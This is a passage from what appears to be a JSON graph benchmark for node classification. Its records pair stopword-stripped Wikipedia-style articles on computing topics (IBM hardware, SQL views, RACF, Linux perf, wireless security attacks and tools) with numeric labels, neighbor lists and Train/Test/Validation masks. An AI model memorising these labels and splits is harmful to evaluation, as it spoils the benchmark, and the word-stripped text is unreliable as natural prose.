    "text": "HighQ_(software):highq software highq privately owned software service saas company providing cloud-based secure file sharing team collaboration social networking software enterprise customers customers legal banking corporate sectors well government life sciences highq founded london 2001 university friends ajay patel veenay shah company offices uk london australia sydney netherlands amsterdam germany frankfurt usa new york r operation india ahmedabad january 2016 highq raised first ever investment round 50m morgan stanley goldman sachs one peak partners help accelerate company expansion us market one top 10 biggest funding rounds europe first quarter 2016 july 2019 thomson reuters announced acquisition highq press release highq included one watch 2013 sunday times tech track 100 league table ranked 74th 2014 tech track 100 league table ranked 32nd among uk ’ top 100 smes sunday times heathrow sme export track 100 2016 highq ranked deloitte technology fast 500 emea 2011 2013 ranked deloitte technology fast 50 uk 2013 highq major clients include barclays linklaters lex mundi clifford chance osborne clarke clyde co allen overy highq clients include 21 top 25 uk law firms including uk magic circle law firms 45 top 100 uk law firms highq offers file sharing extranet collaboration project management virtual data room enterprise social networking knowledge sharing publishing solutions three products cover different aspects use cases highq collaborate highq publisher highq dataroom primary product highq collaborate provides secure document exchange enterprise social collaboration client extranets knowledge portals organisations summer 2013 highq released new mobile-optimised version collaborate saw redesign existing modules added features including responsive design microblogging private messaging centralised notifications enhanced people profiles highq publisher integrated digital marketing publishing platform supports various publishing formats channels including publications videos events microsites email campaigns highq dataroom virtual data room product aimed primarily law firms banks corporations help users exchange transactional information clients partners outside company",
    "neighbors": [
      5202,
      467,
      245
    ],
    "mask": "Test"
  },
  {
    "node_id": 9633,
    "label": 3,
    "text": "IBM_System_9000:ibm system 9000 system 9000 s9000 family microcomputers ibm consisting system 9001 9002 9003 first member family system 9001 laboratory computer introduced may 1982 ibm instruments computer system model 9000 renamed system 9001 1984 system 9000 family name system 9002 multi-user general-purpose business computer introduced last member family system 9003 industrial computer introduced 1985 members system 9000 family find much commercial success entire family discontinued 2 december 1986 system 9000 based around motorola 68000 microprocessor motorola versabus system bus members ibm csos real-time operating system os stored read-only memory system 9002 could also run multi-user microsoft xenix os suitable business use supported four users three versions system 9000 9001 benchtop lab model 9002 desktop model without laboratory-specific features 9003 manufacturing process control version modified suitable factory environments system 9002 9003 based system 9001 based around 8mhz motorola 68000 motorola versabus system bus system 9000 one used versabus input/output ports included three rs-232c serial ports ieee-488 instrument port bidirectional 8-bit parallel port laboratory data acquisition analog-to-digital converters could attached i/o ports available user input could via user-definable 10-key touch panel integrated crt display 57-key user-definable keypad 83-key model f keyboard touch panel keypad designed controlling experiments system 9000 members ibm real-time operating system called csos computer system operating system 128kb read-only memory rom multi-tasking operating system could extended loading components disk ibm also offered microsoft xenix system 9002 required least 640kb main memory versabus card containing memory management unit machines shipped 128kb main memory standard 5mb could added system using memory boards plugged versabus board could contain 1mb installed 256kb increments system 9000 developed ibm instruments inc. ibm subsidiary established 1980 focused selling scientific technical instruments well computer equipment designed control log process instruments originally introduced ibm instruments computer system model 9000 may 1982 long name led referred computer system 9000 cs-9000 cs/9000 cs9000 originally cs9000 available scientific instrument users offered customers wanted use purposes cs9000 unsuccessful niche cheaper ibm personal computer adequate many instrumentation tasks ibm larger general-purpose computers used demanding tasks ibm repositioned cs9000 february 21 1984 family computers renaming system 9000 consisted system 9001 9002 9001 renamed cs9000 retained focus instrumentation market 9002 general-purpose business computer ran ibm csos microsoft xenix operating systems supported one four users 9002 unsuccessful business market due lack business application software support software developers ibm ibm finally introduced new model system 9003 april 1985 computer-aided manufacturing computer also unsuccessful result manufacturing system 9000 family stopped january 1986 remained limited availability discontinued 2 december 1986 reasons cited failure system 9000 poor performance high price led ibm pc used price concern 32-bit microcomputers used performance mattered ibm closed instrument division january 1987 reassigning approximately 150 employees worked positions noting obscurity 1982 release byte january 1983 called system 9000 ibm 'secret computer stated quiet way one exciting new arrivals today microcomputer scene magazine speculated changes would natural candidate business general-purpose computer later review member brandeis university chemistry department criticized several aspects hardware software praised sophisticated basic ibm customer service reviewer concluded cs-9000 fast powerful laboratory computer affordable 1983 ads dealers referred ibm 9000 multi-user micro although name ibm computer system 9000 also advertised ibm also informally referred ibm 9000",
    "neighbors": [
      6787,
      7269,
      6311,
      5450,
      6187,
      780,
      6378,
      5006,
      8792,
      9455,
      10040,
      9397,
      9366,
      3960,
      3323,
      2399
    ],
    "mask": "None"
  },
  {
    "node_id": 9634,
    "label": 1,
    "text": "View_(SQL):view sql database view result set stored query data database users query would persistent database collection object pre-established query command kept database dictionary unlike ordinary base tables relational database view form part physical schema result set virtual table computed collated dynamically data database access view requested changes applied data relevant underlying table reflected data shown subsequent invocations view nosql databases views way query data views provide advantages tables function programming provide abstraction database view another parallel functions database users manipulate nested views thus one view aggregate data views without use views normalization databases second normal form would become much difficult views make easier create lossless join decomposition rows base table lack defined ordering rows available view appear default sorting view relational table relational model defines table set rows since sets ordered — definition — neither rows view therefore order clause view definition meaningless sql standard allow order clause subquery create view command refused create table statement however sorted data obtained view way table — part query statement view nevertheless dbms oracle database abide sql standard restriction database practitioners define views read-only updatable database system determine reverse mapping view schema schema underlying base tables view updatable insert update delete operations performed updatable views read-only views support operations dbms map changes underlying base tables view update done key preservation systems support definition instead triggers views technique allows definition logic execution place insert update delete operation views thus database systems implement data modifications based read-only views however instead trigger change read-only updatable property view various database management systems extended views read-only subsets data particularly materialized views pre-executed non-virtual views commonly used data warehousing give static snapshot data may include data remote sources accuracy materialized view depends frequency trigger mechanisms behind updates materialized views introduced oracle database ibm db2 provides so-called materialized query tables mqts purpose microsoft sql server introduced 2000 version indexed views store separate index table entire data postgresql implemented materialized views 9.3 release view equivalent source query queries run views query modified example exists view named accounts_view content follows application could run simple query rdbms takes simple query replaces equivalent view sends following query optimizer optimizer removes unnecessary fields complexity example necessary read address since parent invocation make use sends query sql engine processing",
    "neighbors": [
      10632,
      8201,
      8979,
      2068,
      10389,
      4630,
      7446,
      2456,
      1049,
      5658,
      5403,
      9112,
      10137,
      11030,
      4255,
      9248,
      9631,
      1447,
      2344,
      4263,
      7080,
      10793,
      10413,
      10286,
      9397,
      5051,
      3004,
      1341,
      7612,
      7868,
      10048,
      5953,
      6850,
      11324,
      2246,
      6470,
      2632,
      9286,
      9290,
      3661,
      10573,
      8788,
      2901,
      10069,
      7767,
      10326,
      987,
      2780,
      8539,
      734,
      4065,
      10849,
      9828,
      1509,
      2022,
      10340,
      8808,
      10471,
      6124,
      2669,
      7022,
      6383,
      2544,
      10737,
      9075,
      7412,
      4598,
      1146,
      3196
    ],
    "mask": "None"
  },
  {
    "node_id": 9635,
    "label": 2,
    "text": "Resource_Access_Control_Facility:resource access control facility racf usually pronounced rack-eff short resource access control facility ibm software product security system provides access control auditing functionality z/os z/vm operating systems racf introduced 1976 main features racf establishes security policies rather permission records set permissions file patterns — set permissions even files yet exist permissions used file object created later time racf continuously evolved support modern security features digital certificates/public key infrastructure services ldap interfaces case sensitive ids/passwords latter reluctant concession promote interoperability systems unix linux underlying zseries z systems hardware works closely racf example digital certificates protected within tamper-proof cryptographic processors major mainframe subsystems especially db2 version 8 use racf provide multi-level security mls primary competitors acf2 topsecret produced ca technologies",
    "neighbors": [
      7,
      4242,
      3477,
      2080,
      2083,
      2087,
      7983,
      7733,
      4663,
      823,
      5433,
      6651,
      10170,
      5568,
      2558,
      10058,
      10831,
      6098,
      6750,
      2143,
      8670,
      2274,
      6888,
      1012,
      5492,
      2168,
      3323,
      125,
      3966
    ],
    "mask": "Test"
  },
  {
    "node_id": 9636,
    "label": 9,
    "text": "Alexander_Repenning:alexander repenning dr. alexander repenning director scalable game design project computer science professor founder agentsheets inc. member center lifelong learning design university colorado boulder repenning inventor drag drop blocks programming research interests include computer science education end-user programmable agents human-computer interaction artificial intelligence repenning teaches educational game design usa asia europe worked research development asea brown boveri research xerox parc apple computer hewlett packard repenning creator agentsheets agentcubes cyberlearning tools used game design computational science applications director scalable game design project using agentsheets leads effort reinvent computer science education public schools game design starting middle school level 10,000 students funding national science foundation itest ce21 programs google scalable game design project conducting largest us study computer science education middle school level including inner city schools remote rural areas native american communities results indicate students across genders ethnicities highly motivated learn computer science game design also learn essential computational thinking skills acquire skills game design later leverage stem simulation creation repenning theoretical contributions include pedagogical framework called zones proximal flow combining vygotsky ’ zone proximal development csikszentmihalyi ’ state flow agentsheets work received numerous awards including gold medal mayor paris “ innovative application education world wide web ” www5 invitation association computing machinery showcase agentsheets one “ best best innovators ” acm1 conference repenning telluride tech festival honoree contributions computer science education previous honorees include vint cerf recognized one fathers internet alan kay recognized one pioneers object-oriented programming repenning served advisor national academy sciences european commission japanese ministry education organization economic co-operation development oecd white house office science technology policy ostp national science foundation reviewer research funding organizations usa canada europe asia chaired conferences end-user programming kids invited give talks guest lectures workshops keynote addresses nationally including stanford mit media lab university colorado numerous international conferences beyond academic recognition repenning work also featured tv news radio newspapers popular press including wired magazine switzerland repenning selected one 100 digital shapers",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 9637,
    "label": 2,
    "text": "Perf_(Linux):perf linux perf sometimes called perf_events perf tools originally performance counters linux pcl performance analyzing tool linux available linux kernel version 2.6.31 userspace controlling utility named codice_1 accessed command line provides number subcommands capable statistical profiling entire system kernel userland code supports hardware performance counters tracepoints software performance counters e.g hrtimer dynamic probes example kprobes uprobes 2012 two ibm engineers recognized perf along oprofile one two commonly used performance counter profiling tools linux interface perf utility kernel consists one syscall done via file descriptor mmapped memory region unlike lttng older versions oprofile service daemons needed functionality integrated kernel perf utility dumps raw data mmapped buffer disk buffer becomes filled according r. vitillo lbnl profiling performed perf involves low overhead architectures provide support hardware counters include x86 powerpc64 ultrasparc iii iv arm v5 v6 v7 cortex-a8 -a9 alpha ev56 superh usage last branch records branch tracing implementation available intel cpus since pentium 4 available patch since version 3.14 linux kernel mainline released march 31 2014 perf also supports running average power limit rapl power consumption measurements available feature certain intel cpus perf natively supported many popular linux distributions including red hat enterprise linux since version 6 released 2010 debian since squeeze version released 2011 perf used several subcommands documentation perf detailed 2014 example document events explain aliases often external tools used get names codes events perf tools also profile based true wall-clock time perf subsystem linux kernels 2.6.37 3.8.8 rhel6 kernel 2.6.32 contained security vulnerability cve-2013-2094 exploited gain root privileges local user problem due incorrect type used 32-bit int instead 64-bit event_id verification code path",
    "neighbors": [
      4616,
      3082,
      5139,
      9244,
      10780,
      10785,
      3618,
      6180,
      8242,
      9266,
      4161,
      10817,
      8772,
      6213,
      3142,
      8268,
      589,
      593,
      2658,
      6244,
      5222,
      7270,
      10856,
      4207,
      5244,
      4734,
      11391,
      7812,
      8326,
      7821,
      4238,
      10382,
      2195,
      2711,
      6808,
      9882,
      6813,
      1694,
      11424,
      2723,
      8364,
      10933,
      5815,
      5822,
      5824,
      1736,
      2762,
      8909,
      6352,
      8410,
      10971,
      4831,
      8928,
      1761,
      2278,
      233,
      4841,
      7403,
      9964,
      10482,
      2294,
      8439,
      2809,
      3323,
      8700,
      7938,
      4360,
      1291,
      4367,
      1298,
      1813,
      792,
      10016,
      295,
      7983,
      11062,
      823,
      6968,
      7992,
      318,
      6464,
      3911,
      6988,
      10063,
      5975,
      11095,
      10091,
      7540,
      11636,
      8573,
      1406,
      8066,
      900,
      5514,
      4493,
      11155,
      9621,
      1431,
      8602,
      11678,
      7584,
      1444,
      1445,
      935,
      4521,
      4011,
      9646,
      1456,
      1972,
      9660,
      9667,
      457,
      5067,
      8147,
      3547,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      5105,
      499,
      2036,
      5620,
      8186,
      2044
    ],
    "mask": "Test"
  },
  {
    "node_id": 9638,
    "label": 3,
    "text": "Atmel_ARM-based_processors:atmel arm-based processors atmel arm-based processors microcontrollers microprocessors integrated circuits microchip technology previously atmel based various 32-bit arm processor cores in-house designed peripherals tool support arm licenses core design series 32-bit processors arm manufacture complete silicon products intellectual property ip arm processors risc reduced instruction set computing similar microchip ’ avr 8-bit products later adoption risc architecture whereas avr architecture used harvard architecture exclusively arm cores harvard cortex-m3 others von neumann architecture arm7tdmi semiconductor companies microchip take arm cores use consistent set instructions register naming add peripheral circuits adcs analog digital converters clock management serial communications usart spi i2c lin usb ethernet lcd camera touch controllers microchip made efforts adapt advanced peripherals power management used little power operate independently without cpu core powered sleepwalking also provided dma external interfaces memories increasing data throughput minimal processor intervention microchip sells mcus microcontroller units internal flash memory mpus microprocessor units use external memory addition chips microchip offers demo boards website distribution channels digi-key farnell ineltek arrow avnet future electronics mouser microchip arm-based products meant specific applications sam4cp used smart-grid energy meters microcontrollers internal program memory well conventional internal registers ram microchip arm mcus range sam d10 series 14 pins 144-pin sam s70 sam e70 products sam4s sam4n sam3s sam3n sam7s 64-pin families pin-compatible ic footprints except usb device though voltage level compatible sam family microchip consists four different sub series sam d10 sam d11 sam d20 sam d21 devices based arm cortex-m0+ processor offer different pin memory feature combinations devices pin- code-compatible share peripherals like event system sercom module arduino zero board uses atsamd21g18 chip 2009 atmel announced atsam3u line flash-based microcontrollers based arm cortex-m3 processor higher end evolution sam7 microcontroller products top clock speed range 100 mhz come variety flash sizes summer 2009 parts still sampling development board recently made available december 2009 atsam3s line announced features several enhancements lower power operation bill materials cost reduction market watchers observe cortex-m3 products competition atmel avr32 uc3a products microcontrollers largely identical peripherals hardware technology flash-based similar clock speeds dense 16/32 bit risc instruction sets atsam4 based arm cortex-m4 core sam4e includes fpu floating-point unit sam4c includes dual-core arm cortex-m4 one core fpu based arm cortex-m7 core wide variety at91 flash-based microcontrollers based arm7tdmi cores chips top clock speed range 60 mhz come variety flash sizes peripheral sets at91sam9xe flash-based microcontrollers based arm926ej-s cores top clock speed range 200 400 mhz come variety flash sizes somewhat resemble flash-equipped at91sam9260 chips microchip introduced at91sam9 processors using arm926ej-s core armv5tej architecture first broad market follow highly successful at91rm9200 processor processors improved predecessor using less power incorporating newer powerful arm core providing variety chips different peripheral sets clocked 200 mhz run twice speed processors include series based arm cortex-a5 core integrated development environments amount documentation arm chips daunting especially newcomers documentation microcontrollers past decades would easily inclusive single document chips evolved documentation grown total documentation especially hard grasp arm chips since consists documents ic manufacturer example microchip documents cpu core vendor arm holdings typical top-down documentation tree manufacturer website manufacturer marketing slides manufacturer datasheet exact physical chip manufacturer detailed reference manual describes common peripherals aspects physical chip family arm core generic user guide arm core technical reference manual arm architecture reference manual describes instruction set microchip additional documents evaluation board user manuals application notes getting started guides software library documents errata see external links section links official microchip arm documents",
    "neighbors": [
      7170,
      10767,
      8720,
      11282,
      9235,
      11289,
      1057,
      38,
      4139,
      8237,
      9774,
      2097,
      11314,
      8250,
      8253,
      6207,
      7745,
      7234,
      7235,
      7747,
      2635,
      99,
      7269,
      8812,
      11374,
      7281,
      10361,
      638,
      11395,
      644,
      8842,
      146,
      659,
      1170,
      7833,
      666,
      5786,
      9371,
      4258,
      4773,
      682,
      9391,
      2224,
      11447,
      9913,
      5823,
      8383,
      10945,
      9928,
      4821,
      2788,
      3301,
      9964,
      6391,
      3835,
      2814,
      781,
      6925,
      7445,
      6950,
      5417,
      2862,
      11054,
      7988,
      10548,
      11062,
      1849,
      6971,
      10562,
      8003,
      6981,
      5963,
      1871,
      1872,
      2383,
      5457,
      9042,
      2388,
      6495,
      1377,
      10603,
      11629,
      6001,
      373,
      8058,
      392,
      3467,
      1428,
      4508,
      5028,
      7077,
      9638,
      7604,
      1461,
      3511,
      9155,
      9163,
      6607,
      6608,
      7631,
      980,
      2517,
      9174,
      9685,
      10199,
      4569,
      2524,
      9182,
      3050,
      1014,
      3575,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 9639,
    "label": 2,
    "text": "IEFBR14:iefbr14 iefbr14 ibm mainframe utility program runs ibm mainframe environments derived os/360 including z/os placeholder returns exit status zero similar true command unix-like systems os/360 derived mainframe systems programs never specify files usually called datasets directly instead reference indirectly job control language jcl statements invoke programs data definition codice_1 statements include disposition codice_2 parameter indicates file managed — whether new file created old one re-used whether file deleted upon completion retained etc iefbr14 created codice_1 statements create delete files easily without program run due certain peculiarity job management system always requires initiator actually execute program even program effectively null statement program used jcl actually need use files cause creation deletion — codice_4 specification work thus simple do-nothing program needed fill role iefbr14 thus used create delete data set using jcl secondary reason run iefbr14 unmount devices usually tapes disks left mounted previous job perhaps error job jcl job ended error either event system operators would often need demount devices started task – codice_5 – often provided purpose simply entering command system console would run started task consisted one step however due design job management dealloc must actually exist system procedure library sys1.proclib lest start command fail also started tasks must single jobstep started task control stc module within job management component operating system accepts single-step jobs fails multi-step jobs without exception least z/os branching execute another program would cause calling program evaluated syntax errors point ief derives convention mainframe computers programs supplied ibm grouped together function creator group shared three-letter prefix os/360 first letter almost always programs produced job management group including iefbr14 used prefix ief common prefixes included ieb dataset utility programs ieh system utility programs iew program linkage loading major components still iea operating system supervisor iec input/output supervisor explained br 14 essential function program simply return operating system portion program name often mnemonic — example iebupdte dataset utility ieb applied updates updte source code files iehinitt system utility ieh initialized init magnetic tape labels explained usage name br14 comes ibm assembler-language instruction branch address register 14 convention used return subroutine early users os/360 familiar ibm assembler language would recognized example jcl would //iefbr14 job acct 'delete dataset msgclass=j class=a //step0001 exec pgm=iefbr14 //deldd dd dsn=xxxxx.yyyyy.zzzzz // disp= mod delete delete unit=dasd create partitioned data set //tzzz84r job notify= sysuid msgclass=x //step01 exec pgm=iefbr14 //dd1 dd dsn=tkol084.demo disp= new catlg delete // dcb= recfm=fb lrecl=80 blksize=80 dsorg=po // space= trk 1,1,1 rlse // unit=sysda iefbr14 consisted initially single instruction branch register 14 mnemonic used ibm assembler br hence name ief br 14 br 14 identically equivalent bcr 15,14 branch always mask 15 always address contained general purpose register 14 br pseudo instruction bcr 15 system assembler accepts many cases pseudo-instructions logical equivalents canonical system/360 instructions canonical instance br 14 bcr 15,14 linkage convention os/360 descendants requires program invoked register 14 containing address return control complete register 15 containing address called program loaded memory completion program loads return code register 15 branches address contained register 14 initially iefbr14 coded characteristics mind iefbr14 initially used dummy control section one simply returned caller executable module original version program alter register 15 original application placeholder certain load modules generated sysgen system generation executable program per se since iefbr14 always invoked functional equivalent canonical balr 14,15 instruction return code register 15 always non-zero later second instruction added clear return code would exit determinant status namely zero initially programmers using properties job control language anyway indeterminate return code problem however subsequently programmers indeed using properties determinate status became mandatory modification iefbr14 way impact original use placeholder machine code modified program equivalent machine code eliminating br clarity makes perfect sense os/360 initiator initially attaches job-step task using attach macro-instruction svc 42 unwinding effect attach macro type 2 svc instruction must complementary instruction namely exit macro necessarily type 1 svc instruction svc 3 trombetta michael finkelstein sue carolyn 1985 os jcl utilities addison wesley page 152",
    "neighbors": [
      10786,
      11656,
      5397,
      2168,
      9977,
      3323,
      477
    ],
    "mask": "None"
  },
  {
    "node_id": 9640,
    "label": 4,
    "text": "Wireless_security:wireless security wireless security prevention unauthorized access damage computers data using wireless networks include wi-fi networks common type wi-fi security includes wired equivalent privacy wep wi-fi protected access wpa wep notoriously weak security standard password uses often cracked minutes basic laptop computer widely available software tools wep old ieee 802.11 standard 1997 superseded 2003 wpa wi-fi protected access wpa quick alternative improve security wep current standard wpa2 hardware support wpa2 without firmware upgrade replacement wpa2 uses encryption device encrypts network 256-bit key longer key length improves security wep enterprises often enforce security using certificate-based system authenticate connecting device following standard 802.1x many laptop computers wireless cards pre-installed ability enter network mobile great benefits however wireless networking prone security issues hackers found wireless networks relatively easy break even use wireless technology hack wired networks result important enterprises define effective wireless security policies guard unauthorized access important resources wireless intrusion prevention systems wips wireless intrusion detection systems wids commonly used enforce wireless security policies risks users wireless technology increased service become popular relatively dangers wireless technology first introduced hackers yet time latch new technology wireless networks commonly found work place however many security risks associated current wireless protocols encryption methods carelessness ignorance exists user corporate level hacking methods become much sophisticated innovative wireless access hacking also become much easier accessible easy-to-use windows- linux-based tools made available web charge organizations wireless access points installed feel need address wireless security concerns in-stat mdr meta group estimated 95 corporate laptop computers planned purchased 2005 equipped wireless cards issues arise supposedly non-wireless organization wireless laptop plugged corporate network hacker could sit parking lot gather information laptops and/or devices even break wireless card–equipped laptop gain access wired network anyone within geographical network range open unencrypted wireless network sniff capture record traffic gain unauthorized access internal network resources well internet use information resources perform disruptive illegal acts security breaches become important concerns enterprise home networks router security activated owner deactivates convenience creates free hotspot since 21st-century laptop pcs wireless networking built see intel centrino technology n't need third-party adapter pcmcia card usb dongle built-in wireless networking might enabled default without owner realizing thus broadcasting laptop accessibility computer nearby modern operating systems linux macos microsoft windows make fairly easy set pc wireless lan base station using internet connection sharing thus allowing pcs home access internet base pc however lack knowledge among users security issues inherent setting systems often may allow others nearby access connection piggybacking usually achieved without wireless network operator knowledge may even without knowledge intruding user computer automatically selects nearby unsecured wireless network use access point wireless security aspect computer security however organizations may particularly vulnerable security breaches caused rogue access points employee trusted entity brings wireless router plugs unsecured switchport entire network exposed anyone within range signals similarly employee adds wireless interface networked computer using open usb port may create breach network security would allow access confidential materials however effective countermeasures like disabling open switchports switch configuration vlan configuration limit network access available protect network information contains countermeasures must applied uniformly network devices due availability low cost use wireless communication technologies increases domains beyond originally intended usage areas e.g m2m communication industrial applications industrial applications often specific security requirements hence important understand characteristics applications evaluate vulnerabilities bearing highest risk context evaluation vulnerabilities resulting vulnerability catalogs industrial context considering wlan nfc zigbee available wireless networks common organizations individuals many laptop computers wireless cards pre-installed ability enter network mobile great benefits however wireless networking prone security issues hackers found wireless networks relatively easy break even use wireless technology hack wired networks result important enterprises define effective wireless security policies guard unauthorized access important resources wireless intrusion prevention systems wips wireless intrusion detection systems wids commonly used enforce wireless security policies relatively dangers wireless technology first introduced effort maintain communication high effort intrude always higher variety risks users wireless technology increased service become popular technology commonly available today great number security risks associated current wireless protocols encryption methods carelessness ignorance exists user corporate level hacking methods become much sophisticated innovative wireless modes unauthorised access links functions data variable respective entities make use program code exist full scope model threat extent prevention relies known modes methods attack relevant methods suppression applied methods however new mode operation create new options threatening hence prevention requires steady drive improvement described modes attack snapshot typical methods scenarios apply violation security perimeter corporate network come number different methods intents one methods referred “ accidental association ” user turns computer latches wireless access point neighboring company overlapping network user may even know occurred however security breach proprietary company information exposed could exist link one company especially true laptop also hooked wired network accidental association case wireless vulnerability called mis-association mis-association accidental deliberate example done bypass corporate firewall result deliberate attempts wireless clients lure connecting attacker aps “ malicious associations ” wireless devices actively made attackers connect company network laptop instead company access point ap types laptops known “ soft aps ” created cyber criminal runs software makes his/her wireless network card look like legitimate access point thief gained access he/she steal passwords launch attacks wired network plant trojans since wireless networks operate layer 2 level layer 3 protections network authentication virtual private networks vpns offer barrier wireless 802.1x authentications help protection still vulnerable hacking idea behind type attack may break vpn security measures likely criminal trying take client layer 2 level ad hoc networks pose security threat ad hoc networks defined peer peer networks wireless computers access point types networks usually little protection encryption methods used provide security security hole provided ad hoc networking ad hoc network bridge provides networks usually corporate environment unfortunate default settings versions microsoft windows feature turned unless explicitly disabled thus user may even know unsecured ad hoc network operation computer also using wired wireless infrastructure network time providing bridge secured organizational network unsecured ad hoc connection bridging two forms direct bridge requires user actually configure bridge two connections thus unlikely initiated unless explicitly desired indirect bridge shared resources user computer indirect bridge may expose private data shared user computer lan connections shared folders private network attached storage making distinction authenticated private connections unauthenticated ad-hoc networks presents threats already familiar open/public unsecured wifi access points firewall rules may circumvented case poorly configured operating systems local settings non-traditional networks personal network bluetooth devices safe hacking regarded security risk even barcode readers handheld pdas wireless printers copiers secured non-traditional networks easily overlooked personnel narrowly focused laptops access points identity theft mac spoofing occurs hacker able listen network traffic identify mac address computer network privileges wireless systems allow kind mac filtering allow authorized computers specific mac ids gain access utilize network however programs exist network “ sniffing ” capabilities combine programs software allow computer pretend mac address hacker desires hacker easily get around hurdle mac filtering effective small residential soho networks since provides protection wireless device air 802.11 device air freely transmits unencrypted mac address 802.11 headers requires special equipment software detect anyone 802.11 receiver laptop wireless adapter freeware wireless packet analyzer obtain mac address transmitting 802.11 within range organizational environment wireless devices air throughout active working shift mac filtering provides false sense security since prevents casual unintended connections organizational infrastructure nothing prevent directed attack man-in-the-middle attacker entices computers log computer set soft ap access point done hacker connects real access point another wireless card offering steady flow traffic transparent hacking computer real network hacker sniff traffic one type man-in-the-middle attack relies security faults challenge handshake protocols execute “ de-authentication attack ” attack forces ap-connected computers drop connections reconnect hacker soft ap disconnects user modem connect using password one extract recording event man-in-the-middle attacks enhanced software lanjack airjack automate multiple steps process meaning required skill done script kiddies hotspots particularly vulnerable attack since little security networks denial-of-service attack dos occurs attacker continually bombards targeted ap access point network bogus requests premature successful connection messages failure messages and/or commands cause legitimate users able get network may even cause network crash attacks rely abuse protocols extensible authentication protocol eap dos attack little expose organizational data malicious attacker since interruption network prevents flow data actually indirectly protects data preventing transmitted usual reason performing dos attack observe recovery wireless network initial handshake codes re-transmitted devices providing opportunity malicious attacker record codes use various cracking tools analyze security weaknesses exploit gain unauthorized access system works best weakly encrypted systems wep number tools available launch dictionary style attack possibly accepted security keys based model security key captured network recovery network injection attack hacker make use access points exposed non-filtered network traffic specifically broadcasting network traffic “ spanning tree ” 802.1d ospf rip hsrp hacker injects bogus networking re-configuration commands affect routers switches intelligent hubs whole network brought manner require rebooting even reprogramming intelligent networking devices caffe latte attack another way defeat wep necessary attacker area network using exploit using process targets windows wireless stack possible obtain wep key remote client sending flood encrypted arp requests assailant takes advantage shared key authentication message modification flaws 802.11 wep attacker uses arp responses obtain wep key less 6 minutes three principal ways secure wireless network ready designed system prevent fraudulent usage wireless communication protect data functions wirelessly communicating computers entities however system qualifying taken measures whole according common understanding shall seen state art system qualifying international consensus specified iso/iec 15408 wireless intrusion prevention system wips concept robust way counteract wireless security risks however wips exist ready designed solution implement software package wips typically implemented overlay existing wireless lan infrastructure although may deployed standalone enforce no-wireless policies within organization wips considered important wireless security july 2009 payment card industry security standards council published wireless guidelines pci dss recommending use wips automate wireless scanning protection large organizations range wireless security measures varying effectiveness practicality simple ineffective method attempt secure wireless network hide ssid service set identifier provides little protection anything casual intrusion efforts one simplest techniques allow access known pre-approved mac addresses wireless access points contain type mac id filtering however attacker simply sniff mac address authorized client spoof address typical wireless access points provide ip addresses clients via dhcp requiring clients set addresses makes difficult casual unsophisticated intruder log onto network provides little protection sophisticated attacker ieee 802.1x ieee standard authentication mechanisms devices wishing attach wireless lan wired equivalent privacy wep encryption standard original encryption standard wireless since 2004 ratification wpa2 ieee declared deprecated often supported seldom never default modern equipment concerns raised security early 2001 dramatically demonstrated 2005 fbi yet 2007 t.j. maxx admitted massive security breach due part reliance wep payment card industry took 2008 prohibit use even allowed existing use continue june 2010 wi-fi protected access wpa wpa2 security protocols later created address problems wep weak password dictionary word short character string used wpa wpa2 cracked using long enough random password e.g 14 random letters passphrase e.g 5 randomly chosen words makes pre-shared key wpa virtually uncrackable second generation wpa security protocol wpa2 based final ieee 802.11i amendment 802.11 standard eligible fips 140-2 compliance encryption schemes client network knows keys read traffic wi-fi protected access wpa software/firmware improvement wep regular wlan-equipment worked wep able simply upgraded new equipment needs bought wpa trimmed-down version 802.11i security standard developed ieee 802.11 replace wep tkip encryption algorithm developed wpa provide improvements wep could fielded firmware upgrades existing 802.11 devices wpa profile also provides optional support aes-ccmp algorithm preferred algorithm 802.11i wpa2 wpa enterprise provides radius based authentication using 802.1x wpa personal uses pre-shared shared key psk establish security using 8 63 character passphrase psk may also entered 64 character hexadecimal string weak psk passphrases broken using off-line dictionary attacks capturing messages four-way exchange client reconnects deauthenticated wireless suites aircrack-ng crack weak passphrase less minute wep/wpa crackers airsnort auditor security collection still wpa personal secure used ‘ good ’ passphrases full 64-character hexadecimal key information however erik tews man created fragmentation attack wep going reveal way breaking wpa tkip implementation tokyo pacsec security conference november 2008 cracking encryption packet 12–15 minutes still announcement 'crack somewhat overblown media august 2009 best attack wpa beck-tews attack partially successful works short data packets decipher wpa key requires specific wpa implementations order work addition wpav1 tkip wids eap may added alongside also vpn-networks non-continuous secure network connections may set 802.11-standard vpn implementations include pptp l2tp ipsec ssh however extra layer security may also cracked tools anger deceit ettercap pptp ike-scan ikeprobe ipsectrace ikecrack ipsec-connections stands temporal key integrity protocol acronym pronounced tee-kip part ieee 802.11i standard tkip implements per-packet key mixing re-keying system also provides message integrity check avoid problems wep wpa-improvement ieee 802.1x standard already improved authentication authorization access wireless wired lans addition extra measures extensible authentication protocol eap initiated even greater amount security eap uses central authentication server unfortunately 2002 maryland professor discovered shortcomings next years shortcomings addressed use tls enhancements new version eap called extended eap available several versions include eap-md5 peapv0 peapv1 eap-mschapv2 leap eap-fast eap-tls eap-ttls mschapv2 eap-sim eap-versions include leap peap eap leap stands lightweight extensible authentication protocol protocol based 802.1x helps minimize original security flaws using wep sophisticated key management system eap-version safer eap-md5 also uses mac address authentication leap secure thc-leapcracker used break cisco ’ version leap used computers connected access point form dictionary attack anwrap asleap finally crackers capable breaking leap peap stands protected extensible authentication protocol protocol allows secure transport data passwords encryption keys without need certificate server developed cisco microsoft rsa security eaps types extensible authentication protocol implementations based eap framework framework established supports existing eap types well future authentication methods eap-tls offers good protection mutual authentication client network authenticated using certificates per-session wep keys eap-fast also offers good protection eap-ttls another alternative made certicom funk software convenient one need distribute certificates users yet offers slightly less protection eap-tls solutions include newer system authentication ieee 802.1x promises enhance security wired wireless networks wireless access points incorporate technologies like often also routers built thus becoming wireless gateways one argue layer 2 layer 3 encryption methods good enough protecting valuable data like passwords personal emails technologies add encryption parts communication path still allowing people spy traffic gained access wired network somehow solution may encryption authorization application layer using technologies like ssl ssh gnupg pgp similar disadvantage end-to-end method may fail cover traffic encryption router level vpn single switch encrypts traffic even udp dns lookups end-to-end encryption hand service secured must encryption turned often every connection must also turned separately sending emails every recipient must support encryption method must exchange keys correctly web web sites offer https even browser sends ip addresses clear text prized resource often access internet office lan owner seeking restrict access face nontrivial enforcement task user authenticate router newest rigorous security implement wlan today 802.11i rsn-standard full-fledged 802.11i standard uses wpav2 however require newest hardware unlike wpav1 thus potentially requiring purchase new equipment new hardware required may either aes-wrap early version 802.11i newer better 